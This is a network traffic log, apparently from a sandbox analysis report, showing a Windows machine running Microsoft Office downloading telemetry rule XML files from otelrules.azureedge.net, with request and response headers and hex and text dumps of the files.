                      Session IDSource IPSource PortDestination IPDestination Port
                      98192.168.2.64981613.107.246.63443
                      TimestampBytes transferredDirectionData
                      2024-12-03 16:52:08 UTC193OUTGET /rules/rule224901v11s19.xml HTTP/1.1
                      Connection: Keep-Alive
                      Accept-Encoding: gzip
                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                      Host: otelrules.azureedge.net
                      2024-12-03 16:52:08 UTC494INHTTP/1.1 200 OK
                      Date: Tue, 03 Dec 2024 16:52:08 GMT
                      Content-Type: text/xml
                      Content-Length: 2284
                      Connection: close
                      Vary: Accept-Encoding
                      Cache-Control: public, max-age=604800, immutable
                      Last-Modified: Tue, 09 Apr 2024 00:27:13 GMT
                      ETag: "0x8DC582BCD58BEEE"
                      x-ms-request-id: 49e8a97e-c01e-008e-5491-3f7381000000
                      x-ms-version: 2018-03-28
                      x-azure-ref: 20241203T165208Z-174f7845968nxc96hC1EWRspw800000015z000000000b1qg
                      x-fd-int-roxy-purgeid: 0
                      X-Cache: TCP_HIT
                      Accept-Ranges: bytes
                      2024-12-03 16:52:08 UTC2284INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 31 22 20 56 3d 22 31 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4c 69 63 65 6e 73 69 6e 67 2e 4f 66 66 69 63 65 43 6c 69 65 6e 74 4c 69 63 65 6e 73 69 6e 67 2e 44 6f 4c 69 63 65 6e 73 65 56 61 6c 69 64 61 74 69 6f 6e 22 20 41 54 54 3d 22 63 31 61 30 64 62 30 31 32 37 39 36 34 36 37 34 61 30 64 36 32 66 64 65 35 61 62 30 66 65 36 32 2d 36 65 63 34 61 63 34 35 2d 63 65 62 63 2d 34 66 38 30 2d 61 61 38 33 2d 62 36 62 39 64 33 61 38 36 65 64 37 2d 37 37 31 39 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 54 3d 22 55 70 6c 6f 61 64 2d 4d 65 64 69 75 6d 22
                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224901" V="11" DC="SM" EN="Office.Licensing.OfficeClientLicensing.DoLicenseValidation" ATT="c1a0db0127964674a0d62fde5ab0fe62-6ec4ac45-cebc-4f80-aa83-b6b9d3a86ed7-7719" SP="CriticalCensus" T="Upload-Medium"


                      Session IDSource IPSource PortDestination IPDestination Port
                      99192.168.2.64981713.107.246.63443
                      TimestampBytes transferredDirectionData
                      2024-12-03 16:52:08 UTC192OUTGET /rules/rule701201v1s19.xml HTTP/1.1
                      Connection: Keep-Alive
                      Accept-Encoding: gzip
                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                      Host: otelrules.azureedge.net
                      2024-12-03 16:52:08 UTC494INHTTP/1.1 200 OK
                      Date: Tue, 03 Dec 2024 16:52:08 GMT
                      Content-Type: text/xml
                      Content-Length: 1393
                      Connection: close
                      Vary: Accept-Encoding
                      Cache-Control: public, max-age=604800, immutable
                      Last-Modified: Tue, 09 Apr 2024 00:27:51 GMT
                      ETag: "0x8DC582BE3E55B6E"
                      x-ms-request-id: d2df421c-b01e-0021-5593-43cab7000000
                      x-ms-version: 2018-03-28
                      x-azure-ref: 20241203T165208Z-174f7845968psccphC1EWRuz9s00000016ag00000000wpgp
                      x-fd-int-roxy-purgeid: 0
                      X-Cache: TCP_HIT
                      Accept-Ranges: bytes
                      2024-12-03 16:52:08 UTC1393INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 58 61 6d 6c 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 58 61 6d 6c 22
                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Xaml.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenXaml"


                      Session IDSource IPSource PortDestination IPDestination Port
                      100192.168.2.64981913.107.246.63443
                      TimestampBytes transferredDirectionData
                      2024-12-03 16:52:08 UTC192OUTGET /rules/rule700201v1s19.xml HTTP/1.1
                      Connection: Keep-Alive
                      Accept-Encoding: gzip
                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                      Host: otelrules.azureedge.net
                      2024-12-03 16:52:09 UTC494INHTTP/1.1 200 OK
                      Date: Tue, 03 Dec 2024 16:52:08 GMT
                      Content-Type: text/xml
                      Content-Length: 1393
                      Connection: close
                      Vary: Accept-Encoding
                      Cache-Control: public, max-age=604800, immutable
                      Last-Modified: Tue, 09 Apr 2024 00:27:50 GMT
                      ETag: "0x8DC582BE39DFC9B"
                      x-ms-request-id: 4793f8bc-701e-0053-5872-433a0a000000
                      x-ms-version: 2018-03-28
                      x-azure-ref: 20241203T165208Z-174f7845968px8v7hC1EWR08ng00000016bg00000000uxhk
                      x-fd-int-roxy-purgeid: 0
                      X-Cache: TCP_HIT
                      Accept-Ranges: bytes
                      2024-12-03 16:52:09 UTC1393INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 57 6f 72 64 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 57 6f 72 64 22
                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Word.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenWord"


                      Session IDSource IPSource PortDestination IPDestination Port
                      101192.168.2.64981813.107.246.63443
                      TimestampBytes transferredDirectionData
                      2024-12-03 16:52:08 UTC192OUTGET /rules/rule701200v1s19.xml HTTP/1.1
                      Connection: Keep-Alive
                      Accept-Encoding: gzip
                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                      Host: otelrules.azureedge.net
                      2024-12-03 16:52:09 UTC494INHTTP/1.1 200 OK
                      Date: Tue, 03 Dec 2024 16:52:08 GMT
                      Content-Type: text/xml
                      Content-Length: 1356
                      Connection: close
                      Vary: Accept-Encoding
                      Cache-Control: public, max-age=604800, immutable
                      Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                      ETag: "0x8DC582BDC681E17"
                      x-ms-request-id: 5bb85073-401e-005b-22cf-439c0c000000
                      x-ms-version: 2018-03-28
                      x-azure-ref: 20241203T165208Z-174f7845968ljs8phC1EWRe6en0000001630000000008fg7
                      x-fd-int-roxy-purgeid: 0
                      X-Cache: TCP_HIT
                      Accept-Ranges: bytes
                      2024-12-03 16:52:09 UTC1356INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 58 61 6d 6c 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 58 61 6d 6c 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20
                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Xaml" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenXaml" S="Medium" /> <F T="2">


                      Session IDSource IPSource PortDestination IPDestination Port
                      102192.168.2.64982013.107.246.63443
                      TimestampBytes transferredDirectionData
                      2024-12-03 16:52:09 UTC192OUTGET /rules/rule700200v1s19.xml HTTP/1.1
                      Connection: Keep-Alive
                      Accept-Encoding: gzip
                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                      Host: otelrules.azureedge.net
                      2024-12-03 16:52:10 UTC494INHTTP/1.1 200 OK
                      Date: Tue, 03 Dec 2024 16:52:09 GMT
                      Content-Type: text/xml
                      Content-Length: 1356
                      Connection: close
                      Vary: Accept-Encoding
                      Cache-Control: public, max-age=604800, immutable
                      Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
                      ETag: "0x8DC582BDF66E42D"
                      x-ms-request-id: c2b00c79-201e-0000-27b2-42a537000000
                      x-ms-version: 2018-03-28
                      x-azure-ref: 20241203T165209Z-174f7845968jrjrxhC1EWRmmrs000000167000000000t6pe
                      x-fd-int-roxy-purgeid: 0
                      X-Cache: TCP_HIT
                      Accept-Ranges: bytes
                      2024-12-03 16:52:10 UTC1356INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 57 6f 72 64 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 57 6f 72 64 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20
                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Word" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenWord" S="Medium" /> <F T="2">


                      Session IDSource IPSource PortDestination IPDestination Port
                      103192.168.2.64982113.107.246.63443
                      TimestampBytes transferredDirectionData
                      2024-12-03 16:52:10 UTC192OUTGET /rules/rule702351v1s19.xml HTTP/1.1
                      Connection: Keep-Alive
                      Accept-Encoding: gzip
                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                      Host: otelrules.azureedge.net
                      2024-12-03 16:52:11 UTC494INHTTP/1.1 200 OK
                      Date: Tue, 03 Dec 2024 16:52:10 GMT
                      Content-Type: text/xml
                      Content-Length: 1395
                      Connection: close
                      Vary: Accept-Encoding
                      Cache-Control: public, max-age=604800, immutable
                      Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                      ETag: "0x8DC582BE017CAD3"
                      x-ms-request-id: 58ff5c75-a01e-0053-58bd-428603000000
                      x-ms-version: 2018-03-28
                      x-azure-ref: 20241203T165210Z-174f7845968cdxdrhC1EWRg0en000000164g00000000gtnz
                      x-fd-int-roxy-purgeid: 0
                      X-Cache: TCP_HIT
                      Accept-Ranges: bytes
                      2024-12-03 16:52:11 UTC1395INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 6f 69 63 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 6f 69 63
                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Voice.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVoic


                      Session IDSource IPSource PortDestination IPDestination Port
                      104192.168.2.64982213.107.246.63443
                      TimestampBytes transferredDirectionData
                      2024-12-03 16:52:10 UTC192OUTGET /rules/rule702350v1s19.xml HTTP/1.1
                      Connection: Keep-Alive
                      Accept-Encoding: gzip
                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                      Host: otelrules.azureedge.net
                      2024-12-03 16:52:11 UTC494INHTTP/1.1 200 OK
                      Date: Tue, 03 Dec 2024 16:52:10 GMT
                      Content-Type: text/xml
                      Content-Length: 1358
                      Connection: close
                      Vary: Accept-Encoding
                      Cache-Control: public, max-age=604800, immutable
                      Last-Modified: Tue, 09 Apr 2024 00:27:54 GMT
                      ETag: "0x8DC582BE6431446"
                      x-ms-request-id: 6c097c63-301e-0000-5ac7-43eecc000000
                      x-ms-version: 2018-03-28
                      x-azure-ref: 20241203T165210Z-174f7845968zgtf6hC1EWRqd8s0000000z3000000000q8mr
                      x-fd-int-roxy-purgeid: 0
                      X-Cache: TCP_HIT
                      Accept-Ranges: bytes
                      2024-12-03 16:52:11 UTC1358INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 6f 69 63 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 6f 69 63 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20
                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Voice" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVoice" S="Medium" /> <F T="2">


                      Session IDSource IPSource PortDestination IPDestination Port
                      105192.168.2.64982413.107.246.63443
                      TimestampBytes transferredDirectionData
                      2024-12-03 16:52:11 UTC192OUTGET /rules/rule701250v1s19.xml HTTP/1.1
                      Connection: Keep-Alive
                      Accept-Encoding: gzip
                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                      Host: otelrules.azureedge.net
                      2024-12-03 16:52:11 UTC494INHTTP/1.1 200 OK
                      Date: Tue, 03 Dec 2024 16:52:11 GMT
                      Content-Type: text/xml
                      Content-Length: 1358
                      Connection: close
                      Vary: Accept-Encoding
                      Cache-Control: public, max-age=604800, immutable
                      Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                      ETag: "0x8DC582BE022ECC5"
                      x-ms-request-id: 8e63dee6-401e-002a-6d1e-45c62e000000
                      x-ms-version: 2018-03-28
                      x-azure-ref: 20241203T165211Z-174f7845968cdxdrhC1EWRg0en000000165g00000000d5sz
                      x-fd-int-roxy-purgeid: 0
                      X-Cache: TCP_HIT
                      Accept-Ranges: bytes
                      2024-12-03 16:52:11 UTC1358INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 69 73 69 6f 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 69 73 69 6f 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20
                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701250" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Visio" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVisio" S="Medium" /> <F T="2">


                      Session IDSource IPSource PortDestination IPDestination Port
                      106192.168.2.64982313.107.246.63443
                      TimestampBytes transferredDirectionData
                      2024-12-03 16:52:11 UTC192OUTGET /rules/rule701251v1s19.xml HTTP/1.1
                      Connection: Keep-Alive
                      Accept-Encoding: gzip
                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                      Host: otelrules.azureedge.net
                      2024-12-03 16:52:11 UTC494INHTTP/1.1 200 OK
                      Date: Tue, 03 Dec 2024 16:52:11 GMT
                      Content-Type: text/xml
                      Content-Length: 1395
                      Connection: close
                      Vary: Accept-Encoding
                      Cache-Control: public, max-age=604800, immutable
                      Last-Modified: Tue, 09 Apr 2024 00:27:41 GMT
                      ETag: "0x8DC582BDE12A98D"
                      x-ms-request-id: 7e8f62d2-801e-0047-4379-407265000000
                      x-ms-version: 2018-03-28
                      x-azure-ref: 20241203T165211Z-174f78459685m244hC1EWRgp2c000000160000000000k91w
                      x-fd-int-roxy-purgeid: 0
                      X-Cache: TCP_HIT
                      Accept-Ranges: bytes
                      2024-12-03 16:52:11 UTC1395INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 69 73 69 6f 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 69 73 69
                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701251" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Visio.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVisi


                      Session IDSource IPSource PortDestination IPDestination Port
                      107192.168.2.64982513.107.246.63443
                      TimestampBytes transferredDirectionData
                      2024-12-03 16:52:11 UTC192OUTGET /rules/rule700051v1s19.xml HTTP/1.1
                      Connection: Keep-Alive
                      Accept-Encoding: gzip
                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                      Host: otelrules.azureedge.net
                      2024-12-03 16:52:12 UTC494INHTTP/1.1 200 OK
                      Date: Tue, 03 Dec 2024 16:52:12 GMT
                      Content-Type: text/xml
                      Content-Length: 1389
                      Connection: close
                      Vary: Accept-Encoding
                      Cache-Control: public, max-age=604800, immutable
                      Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                      ETag: "0x8DC582BE10A6BC1"
                      x-ms-request-id: 179ef32c-501e-0016-1fc5-43181b000000
                      x-ms-version: 2018-03-28
                      x-azure-ref: 20241203T165212Z-174f7845968zgtf6hC1EWRqd8s0000000z1000000000xnqx
                      x-fd-int-roxy-purgeid: 0
                      X-Cache: TCP_HIT
                      Accept-Ranges: bytes
                      2024-12-03 16:52:12 UTC1389INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 30 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 55 58 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 55 58 22 20 53 3d 22
                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700051" V="1" DC="SM" EN="Office.Telemetry.Event.Office.UX.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenUX" S="


                      Session IDSource IPSource PortDestination IPDestination Port
                      108192.168.2.64982613.107.246.63443
                      TimestampBytes transferredDirectionData
                      2024-12-03 16:52:12 UTC192OUTGET /rules/rule702951v1s19.xml HTTP/1.1
                      Connection: Keep-Alive
                      Accept-Encoding: gzip
                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                      Host: otelrules.azureedge.net
                      2024-12-03 16:52:13 UTC494INHTTP/1.1 200 OK
                      Date: Tue, 03 Dec 2024 16:52:13 GMT
                      Content-Type: text/xml
                      Content-Length: 1405
                      Connection: close
                      Vary: Accept-Encoding
                      Cache-Control: public, max-age=604800, immutable
                      Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                      ETag: "0x8DC582BE12B5C71"
                      x-ms-request-id: 44636861-901e-0083-5170-43bb55000000
                      x-ms-version: 2018-03-28
                      x-azure-ref: 20241203T165213Z-174f7845968ljs8phC1EWRe6en00000015y000000000ukh5
                      x-fd-int-roxy-purgeid: 0
                      X-Cache: TCP_HIT
                      Accept-Ranges: bytes
                      2024-12-03 16:52:13 UTC1405INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 39 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 72 61 6e 73 6c 61 74 6f 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65
                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702951" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Translator.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToke


                      Session IDSource IPSource PortDestination IPDestination Port
                      109192.168.2.64982713.107.246.63443
                      TimestampBytes transferredDirectionData
                      2024-12-03 16:52:13 UTC192OUTGET /rules/rule700050v1s19.xml HTTP/1.1
                      Connection: Keep-Alive
                      Accept-Encoding: gzip
                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                      Host: otelrules.azureedge.net
                      2024-12-03 16:52:13 UTC494INHTTP/1.1 200 OK
                      Date: Tue, 03 Dec 2024 16:52:13 GMT
                      Content-Type: text/xml
                      Content-Length: 1352
                      Connection: close
                      Vary: Accept-Encoding
                      Cache-Control: public, max-age=604800, immutable
                      Last-Modified: Tue, 09 Apr 2024 00:28:01 GMT
                      ETag: "0x8DC582BE9DEEE28"
                      x-ms-request-id: 0e5d9e53-c01e-0066-77ee-44a1ec000000
                      x-ms-version: 2018-03-28
                      x-azure-ref: 20241203T165213Z-174f7845968glpgnhC1EWR7uec00000016e00000000049gu
                      x-fd-int-roxy-purgeid: 0
                      X-Cache: TCP_HIT
                      Accept-Ranges: bytes
